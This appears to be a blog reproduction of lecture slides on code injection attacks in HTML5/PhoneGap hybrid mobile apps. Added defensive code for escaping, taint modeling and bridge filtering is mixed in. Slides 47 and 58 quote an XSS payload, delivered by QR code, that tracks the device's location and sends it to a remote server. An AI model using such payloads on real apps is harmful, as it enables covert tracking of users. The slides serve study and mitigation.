Architecture of a hybrid app PhoneGap – Open Source Framework. The de-facto standard for hybrid app development; Now in transition into becoming “Apache ...

Published by Jeff on 2018/06/09 00:00

Notes

1. Code Injection Attacks on HTML5-based Mobile Apps: Characterization, Detection and Mitigation
   Xing Jin, Xunchao Hu, Kailiang Ying, Wenliang Du, Heng Yin and Gautam Nagesh Peri

2. Outline
   Background and motivation
   Overall problem definition and challenges
   Related work
   Solutions for paper 1
   Solutions for paper 2
   Comparison between the two papers
   Conclusions

5. Hybrid Apps

6. App Development Comparison

7. Architecture of a hybrid app
   Native container:
     Creates an instance of UIWebView, android.webkit.WebView, etc.
     Navigates to the main HTML file
     Implements a listener/handler for requests coming from the JS code
     Activates JS code when necessary
   HTML5/CSS3/JS code:
     Implements the UI and app logic
     Activates native handlers through an OS-specific mechanism (custom URL scheme)
     Receives responses through JS handlers

8. HTML5-based Mobile App: Hybrid apps

9. Architecture of a hybrid app
   PhoneGap – Open Source Framework
     The de-facto standard for hybrid app development
     Now in transition into becoming "Apache Callback"
   Provides:
     A template implementation for the native container
     An implementation of the JS<->Native bridge for 6 mobile OSs
     OS-independent JS APIs for activating device functions

10. PhoneGap Architecture

11. HTML5-based Mobile App and Risk

12. Overview of HTML5-based Mobile App

14. Overview of HTML5-based Mobile App
   PhoneGap: Device, Accelerometer, Camera, Compass, Contacts, File, Geolocation, Notification, …
   WebView: HTML, CSS, JavaScript; connected to native code through addJavascriptInterface()
   Advantage: can be easily ported between different platforms
   Disadvantage: need to build the bridge between JavaScript and native resources

15. Overview of PhoneGap Architecture

16. Example: raising a native alert from JS code

17. Example: accessing the camera

19. Risks in HTML5-based Mobile App (JavaScript)
   Data and code can be mixed together:
     var text = "Hello!<script>alert('hello')</script>";
     document.write(text);
   Once it runs, the data will be displayed, and the JavaScript code will also be executed.

20. Attack Procedures: Shortened URLs

21. Attack Procedures: SMS / WhatsApp / Facebook Messages / Emails

22. Attack Procedures: SMS / WhatsApp / Facebook Messages / Emails
   In Facebook Messenger's in-app browser, clicking the message executed the XSS payload

23. Attack Procedures: Stealing content from a Web SQL Database by XSS
   Sample: a Web SQL database was initialised, storing city information
   An XSS vulnerability was injected into the code from the QueryString
   An XSS payload was inserted in the URL to retrieve the first city name from the table "city"

24. Attack Procedures: Stealing content from a Web SQL Database by XSS
   The city name of the first record was successfully retrieved by XSS

25. Attack Procedures: Eavesdropping on Mobile Website Traffic
   A sample mobile website required the user to log in, and a profile page was displayed after authentication

26. Attack Procedures: Eavesdropping on Mobile Website Traffic
   tcpdump was installed in the Android Emulator and captured all the network traffic from the Emulator

27. Attack Procedures: Eavesdropping on Mobile Website Traffic
   The plaintext traffic was viewed in Wireshark; the username and password were captured easily

28. Demo: Would you scan this?

29. Demo (Video): www.cis.syr.edu/~wedu/android/JSCodeInjection/index.html

31. Related work: Hybrid Apps Security, the 'addJavascriptInterface' vulnerability

32. Hybrid apps: No Bridge Policy, No Load Policy

33. Hybrid apps

34. AddJavaScriptInterface Vulnerability
   Google Android vulnerability: CVE-2013-4710

36. Other Static Analysis in Android
   Problem classes: Privilege escalation (Permission), Component Hijacking (Intent), SSL/TLS
   Tools: Stowaway, Chex, SMV-HUNTER, Pscout, Woodpecker, ContentScope, MalloDroid, ComDroid, AppSealer, CryptoLint

38. Outline
   Code Injection Attacks on HTML5-based mobile apps
   Detection of Code Injection Attacks on HTML5-based mobile apps
   Mitigation of Code Injection Attacks on HTML5-based mobile apps

39. Code Injection Attacks on HTML5-based Mobile App

40. Cross-Site Scripting Attack (XSS)

41. Overview of our Attack: a much broader attack surface

42. Condition 1: Attack Channels (NFC, SMS, MP3)

43. Condition 2: Display APIs (Triggering Code)
   In our sample set (15,510 apps), 93% of apps use at least one unsafe API/attribute at least once

44. Vulnerable Code Example
     document.addEventListener("deviceready", onDeviceReady, false);
     function onDeviceReady() {
       window.plugins.barcodeScanner.scan(0, onSuccess, onError);   // Condition 1 (channel: barcode)
     }
     function onSuccess(result) {
       $("#display").html(result.text);                             // Condition 2 (vulnerable API: html)
     }
     function onError(contactError) {
       alert('onError!');
     }
     function unrelated() {
       alert('Unrelated function');
     }
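The two conditions on slide 44 meet in one line: scanned text (Condition 1) reaches an HTML-parsing sink (Condition 2). The following is an added example, not code from the slides or from the paper's tool. It shows the hardened form of the success handler (escape the five HTML-significant characters, which is what a text sink such as jQuery's .text() does internally) next to a small defender-side scanner that lists the executable constructs a browser would see if a string were handed to .html(). The names escapeHtml, displayText and findActiveContent, and the sample scans, are constructed for this example.

```javascript
// Added example (not from the slides or the paper's tool). Names and sample
// inputs are assumptions made for this illustration.

// Hardened success handler: escape before the data reaches the page, so the
// HTML parser only ever sees text. Using $("#display").text(result.text)
// instead of .html(result.text) has the same effect.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}
function displayText(resultText) {
  return escapeHtml(resultText); // the markup that an .html() sink would receive
}

// Defender-side check: enumerate markup that would execute if parsed as HTML.
// The tag scan is deliberately simple (no entity decoding, no comment handling),
// so it is a description of the threat for logging or review, not a sanitizer.
function findActiveContent(html) {
  const findings = [];
  const tagRe = /<\s*([a-zA-Z][\w-]*)\b([^>]*)>/g;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const tag = m[1].toLowerCase();
    const attrs = m[2];
    if (tag === 'script') findings.push({ tag, reason: 'script element' });
    const handler = /\bon[a-z]+\s*=/i.exec(attrs);
    if (handler) {
      findings.push({ tag, reason: 'event handler ' + handler[0].replace(/\s*=$/, '').toLowerCase() });
    }
    if (/\b(href|src)\s*=\s*['"]?\s*javascript:/i.test(attrs)) {
      findings.push({ tag, reason: 'javascript: URL' });
    }
  }
  return findings;
}

// Constructed sample scans: a benign product code containing angle brackets,
// and a payload of the same shape as the one on slide 47 (reduced to alert(1)).
const BENIGN_SCAN = 'SKU-4411 Widget <10 pcs>';
const MALICIOUS_SCAN = '<img src=x onerror=alert(1)>';

// Before: the raw string reaches the HTML parser and carries an onerror handler.
// After: displayText() returns '&lt;img src=x onerror=alert(1)&gt;', which is inert.
```

The benign scan is worth keeping in mind: a text containing `<10 pcs>` is legitimate data, and the escaping route preserves it verbatim on screen, whereas any approach that strips tags would alter it.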

45. Achieving Damage
   1. Directly attack system resources
   2. Propagate to other apps
   3. Propagate to other devices

46. Real Vulnerable App Example
   Malicious QR code -> Vulnerable App (Android, iOS, Windows Phone) -> Being Traced

47. Real Vulnerable App Example
   The malicious code injected in the QR code:
     <img src=x onerror=
       navigator.geolocation.watchPosition(
         function(loc){
           m='Latitude:'+loc.coords.latitude+' '+'Longitude:'+loc.coords.longitude;
           alert(m);
           b=document.createElement('img');
           b.src='http://128.***.213.66:5556?c='+m
         })>
   Uses the HTML5 Geolocation API to get the location
   Alerts the location information for demonstration purposes
   Real damage: sends the location information to a remote server

48. Detection of Code Injection Attacks on HTML5-based Mobile App

49. Challenges
   C1: Mixture of application and framework code
   C2: Difficulties in static analysis on JavaScript
   C3: Dynamically loaded content
     <html>
       <head>
         <script src="www.example.com/load.js"></script>                     <!-- C3 -->
       </head>
       <body>
         <script>
           document.addEventListener("deviceready", onDeviceReady, false);  // C2
           function onDeviceReady() {
             window.plugins.barcodeScanner.scan(0, onSuccess, onError);       // C1
           }
           ……
         </script>
       </body>
     </html>

50. Framework Modeling
   Goal: connect data flow within the PhoneGap Framework
   PhoneGap Framework Model (data flow: app call -> model -> app callbacks):
     window = { plugins: { barcodeScanner: {
       scan: function scan(mode, suc, err) {
         exec(suc, err, "scan", [mode]);
       } } } };
     exec = function exec(suc, err, plugin, op, arg) {
       var dat = "fake";
       suc(dat);
       err(dat);
     };
   App code: window.plugins.barcodeScanner.scan(0, onSuccess, onError);
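To make the modeling idea concrete, here is an executable version of the slide-50 model. It is an added example and not the paper's analysis tool: the real tool does static analysis over the app's JavaScript, whereas this runs the app's deviceready code against a model in which every plugin entry point hands its callbacks a tainted placeholder value (the slide's "fake" data) and the jQuery DOM-writing methods are modelled as sinks that record when a tainted value reaches one that parses markup. The names Tainted, makeFrameworkModel, analyzeApp and the two sample apps are assumptions made for this example.

```javascript
// Added example (not the paper's tool). Executable framework model in the
// spirit of slide 50; all names and the sample apps are assumptions.

// A placeholder value that remembers which plugin channel produced it.
class Tainted {
  constructor(channel) { this.channel = channel; this.value = 'fake'; }
  toString() { return this.value; }
}

// jQuery methods that hand their argument to the HTML parser vs. ones that do not.
const UNSAFE_SINKS = new Set(['html', 'append', 'prepend', 'after', 'before']);
const SAFE_SINKS = new Set(['text', 'val']);

// Model of window.plugins.<plugin>.<op> -> exec -> callbacks, as on the slide.
// exec invokes both callbacks so that every path the app could take is explored.
function makeFrameworkModel(findings) {
  function exec(suc, err, plugin, op) {
    const dat = new Tainted(`${plugin}.${op}`);
    if (typeof suc === 'function') suc({ text: dat, cancelled: false });
    if (typeof err === 'function') err(dat);
  }
  const win = {
    plugins: {
      barcodeScanner: { scan: (mode, suc, err) => exec(suc, err, 'barcodeScanner', 'scan') },
    },
  };
  // Model of $("#selector"): an object whose methods are the sinks above.
  const $ = (selector) => {
    const el = {};
    for (const name of [...UNSAFE_SINKS, ...SAFE_SINKS]) {
      el[name] = (data) => {
        if (data instanceof Tainted && UNSAFE_SINKS.has(name)) {
          findings.push({ channel: data.channel, sink: name, selector });
        }
        return el;
      };
    }
    return el;
  };
  return { window: win, $ };
}

// Run an app's deviceready logic against the model; return channel -> sink flows.
function analyzeApp(app) {
  const findings = [];
  const model = makeFrameworkModel(findings);
  app(model.window, model.$);
  return findings;
}

// Constructed app in the shape of slide 44 (vulnerable) and its fixed twin.
function vulnerableApp(window, $) {
  function onSuccess(result) { $('#display').html(result.text); }
  function onError(e) { /* alert('onError!') in the original */ }
  window.plugins.barcodeScanner.scan(0, onSuccess, onError);
}
function fixedApp(window, $) {
  function onSuccess(result) { $('#display').text(result.text); }
  window.plugins.barcodeScanner.scan(0, onSuccess, () => {});
}
```

This dynamic stand-in shows why the model is needed (without it, the analysis sees a call into an opaque `window.plugins` object and cannot connect the scan to the `.html()` call), but it also shows its limit: taint is carried by the `Tainted` object, so `'Scanned: ' + result.text` would collapse to a plain string and the flow would be lost. A static taint analysis of the kind described on the slides tracks string operations symbolically for exactly that reason.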

51. Evaluation
   Dataset: 15,510 apps from the official Google Play Market
   Hardware spec: Intel Core i7-2600 3.4 GHz with 16 GB RAM
   Performance: average processing time 15.38 sec/app
   Accuracy: 478/15,510 flagged as vulnerable; false positive rate 2.30% (because of dead code)

52. Case Study: selected 20 apps (the most powerful ones)

53. Mitigation of Code Injection Attacks on HTML5-based Mobile App

54. Mitigation (architecture of the patched PhoneGap app)
   PhoneGap App
     PhoneGap Framework (Java)
       Plugins (Java): Camera, Contact, SMS
       Bridge: Plugin Manager, Filter (jsoup), JSMessage Queue
     WebView: HTML5, CSS, JavaScript (connected via addJavascriptInterface)
   Resources
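The mitigation slide places a filter (jsoup) in the bridge, so plugin results are cleaned before the JSMessage Queue delivers them to the WebView. The block below is an added example, not NoInjection's Java code: it simulates that bridge step in JavaScript with a small character-level tag stripper standing in for jsoup's cleaner. The names stripMarkup, filterResult, deliverToWebView and the sample scan result are assumptions made for this example.

```javascript
// Added example (not NoInjection or the PhoneGap project's code). A simulated
// bridge-side filter; stripMarkup is a simplified stand-in for jsoup.

// Remove every tag with a character scan rather than a regex, so a '>' inside
// a quoted attribute value does not end the tag early. As HTML tokenizers do,
// a '<' opens a tag only when followed by a name start, '/', '!' or '?', so
// "a < b" survives as text. Quotes delimit a value only directly after '='.
function stripMarkup(s) {
  const str = String(s);
  let out = '';
  let i = 0;
  while (i < str.length) {
    const ch = str[i];
    if (ch === '<' && i + 1 < str.length && /[A-Za-z\/!?]/.test(str[i + 1])) {
      let quote = null;
      let afterEq = false;
      i++;
      while (i < str.length) {
        const c = str[i];
        if (quote) { if (c === quote) quote = null; }
        else if ((c === '"' || c === "'") && afterEq) { quote = c; afterEq = false; }
        else if (c === '>') break;
        else if (c === '=') afterEq = true;
        else if (!/\s/.test(c)) afterEq = false;
        i++;
      }
      i++; // step past the closing '>'
      continue;
    }
    out += ch;
    i++;
  }
  return out;
}

// Plugin results carrying user-controlled strings (barcode text, contact
// names, SMS bodies) are filtered field by field, recursing into arrays and
// nested objects; numbers and booleans pass through unchanged.
function filterResult(result) {
  if (typeof result === 'string') return stripMarkup(result);
  if (Array.isArray(result)) return result.map(filterResult);
  if (result && typeof result === 'object') {
    const clean = {};
    for (const [k, v] of Object.entries(result)) clean[k] = filterResult(v);
    return clean;
  }
  return result;
}

// Simulated bridge delivery: plugin result -> filter -> JavaScript success callback.
function deliverToWebView(result, successCallback) {
  const filtered = filterResult(result);
  successCallback(filtered);
  return filtered;
}

// Constructed sample: a barcode scan result of the shape used on slide 44,
// with a payload of the same form as slide 47 reduced to alert(1).
const SAMPLE_SCAN_RESULT = {
  text: '<img src=x onerror=alert(1)>Order 42',
  format: 'QR_CODE',
  cancelled: false,
};
```

Two properties of this placement are worth noting. It protects every app built on the patched framework without touching app code, which is its attraction; but it is only meaningful for HTML-context sinks. Data that an app passes to `eval`, to `setTimeout` with a string, or into a `javascript:` URL is not markup and is not affected, and legitimate data containing angle brackets is silently altered (the slide-44 style `<10 pcs>` becomes `10 pcs>` only if the `<` is not followed by a letter; `<b>` in a product name disappears). Escaping at the sink inside the app remains the more precise fix.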

57. XSS
   Pages that are susceptible to XSS attacks often allow users to add content to the page
   Simple attack vectors: weblog comments, message board postings, adding to a wiki
   Add the following content:
     <script type="text/javascript">
       alert('vulnerable');
     </script>

58. XSS
     <img src=x onerror=
       navigator.geolocation.watchPosition(
         function(loc){
           m='Latitude:'+loc.coords.latitude+' '+'Longitude:'+loc.coords.longitude;
           alert(m);
           b=document.createElement('img');
           b.src='http://128.***.213.66:5556?c='+m
         })>

59. Same Origin Policy
   Working with iframes: a parent window can get a reference to a frame's document
     var x = document.getElementById("myframe");
     var y = x.contentDocument;
     document.write(y.cookie);
   How is this safe for something like <iframe src="http://www.twitter.com">?

63. When mobile meets web…
   A web attacker cannot execute native code on the user's device. He can only execute scripts from third parties, within an iframe or in the data. Those scripts can be malicious.

64. When mobile meets web…
   Comparison of the primary paper and the reference paper:
     Concentration
       Primary paper:   Code injection attacks
       Reference paper: Origin-based access control
     Vulnerability
       Primary paper:   A number of unique channels can be used by JavaScript to inject code
       Reference paper: Fracking: untrusted web content reaches local resources on the device
     Challenge
       Primary paper:   The developer does not know whether there is any JS code in their data
       Reference paper: Hybrid applications do not correctly compose the same-origin policy and the access control policy
     Mitigation
       Primary paper:   Add a filter inside the PhoneGap bridge
       Reference paper: Add a random token to the PhoneGap bridge for access to local resources

66. Conclusion
   Presented a systematic study of Code Injection Attacks on HTML5-based mobile apps
   Designed and implemented a tool to automatically detect the vulnerabilities in HTML5-based mobile apps
   Implemented a prototype (NoInjection) as a patch to the PhoneGap framework on Android to mitigate the attack

Author: Jeff, Web Developer and Wiki author from Belgrade